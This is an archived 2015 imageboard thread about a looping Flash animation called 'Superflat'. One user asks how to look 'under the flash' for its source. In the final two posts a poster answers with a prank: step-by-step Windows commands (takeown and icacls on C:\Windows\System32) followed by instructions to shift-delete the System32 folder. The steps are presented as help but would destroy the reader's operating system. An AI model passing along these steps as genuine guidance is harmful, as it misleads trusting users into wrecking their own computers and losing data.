File: Superflat.swf-(7.76 MB, 500x500, Loop)
[_] chill Anonymous 04/16/15(Thu)23:47 No.2751501
Marked for deletion (old).
>> [_] Anonymous 04/17/15(Fri)00:25 No.2751534
Source is under the flash
>> [_] Anonymous 04/17/15(Fri)00:40 No.2751555
Under the flash? How do you look there?
>> [_] Anonymous 04/17/15(Fri)00:57 No.2751572
>>2751555
the source is even in the title. superflat by the m machine.
imgur.com/2nxxdIB
>> [_] Anonymous 04/17/15(Fri)01:11 No.2751588
>>2751555
http://i.imgur.com/4ig8YfX.png
follow this guide so you can do it for yourself
>> [_] Anonymous 04/17/15(Fri)01:18 No.2751591
with no handlebars. No handlebars. No handlebars.
>> [_] Anonymous 04/17/15(Fri)02:51 No.2751675
>>2751588
Don't listen to this bozo >>2751588 here is how you do it:
>Click “Start,” type “cmd” and press the “Ctrl,” “Shift” and “Enter” keys together to load the
Command Prompt console with administrative privileges.
>Type “takeown /f C:\Windows\System32” and press “Enter” to take ownership of the System32 folder.
>Type “Icacls C:\Windows\System32 ” and press “Enter” to give yourself rights to delete the
"System32" folder.
>Close the Command Prompt console by typing “Exit” and then pressing “Enter"
Then...
>> [_] Anonymous 04/17/15(Fri)02:52 No.2751676
>>2751675
Then...
>Close all applications that are running on your computer.
>Double-click the “Computer” icon on the Windows desktop to open “Windows Explorer.”
>Double-click the icon labeled “Local Disk C:” and then enter the folder labeled “Windows.”
>Select the folder labeled “System32” by clicking on it.
>Press the “Shift” and “Del” keys together and click “Yes” on the “Delete Folder” confirmation
dialog box to delete the "System32" folder. Click “Yes to All” on any “File Delete” dialog boxes
that you encounter during the file deletion process.